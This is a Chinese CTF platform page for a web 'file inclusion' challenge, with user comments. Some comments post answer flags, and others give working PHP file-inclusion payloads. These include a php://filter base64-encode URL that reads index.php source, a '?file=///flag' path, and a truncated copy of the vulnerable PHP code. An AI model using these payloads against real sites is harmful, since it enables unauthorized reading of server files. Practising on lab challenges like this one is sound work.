列表

详情


文件包含

平台   WEB   已通过

题目作者: harry

一  血: ‌‌‌‌‌不会CTF的麻风

一血奖励: 1金币

解  决: 10192

提  示:

描  述: flag{}

去做题

mayanqing @ 2024-05-30 23:20:07 👍0

flag{0e6cd91a87d0df4e99802a322b41c74b}


Tolayxu @ 2024-05-14 23:20:07 👍0

跟南邮ctf一摸一样


17344057285 @ 2024-05-07 23:20:07 👍0

flag{b8aba5bfc55997b3368ac7b88fe3854f}


YUMEKO @ 2024-04-07 23:20:07 👍1

http://xxxxxxxxxxxxx/index.php?file=///flag


15614005380 @ 2024-03-07 23:20:07 👍0

php伪协议的简单利用


zh2i @ 2023-12-07 23:20:07 👍0


YUMEKO @ 2024-04-07 23:20:07 👍0

过分了,谁都知道是伪协议


EtHat @ 2023-12-07 23:20:07 👍0

?file=php://filter/read=convert.base64-encode/resource=index.php


bkyhack123 @ 2023-11-07 23:20:07 👍0

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr


bkyhack123 @ 2023-11-07 23:20:07 👍0

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr


fonddream @ 2023-11-07 23:20:07 👍1

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg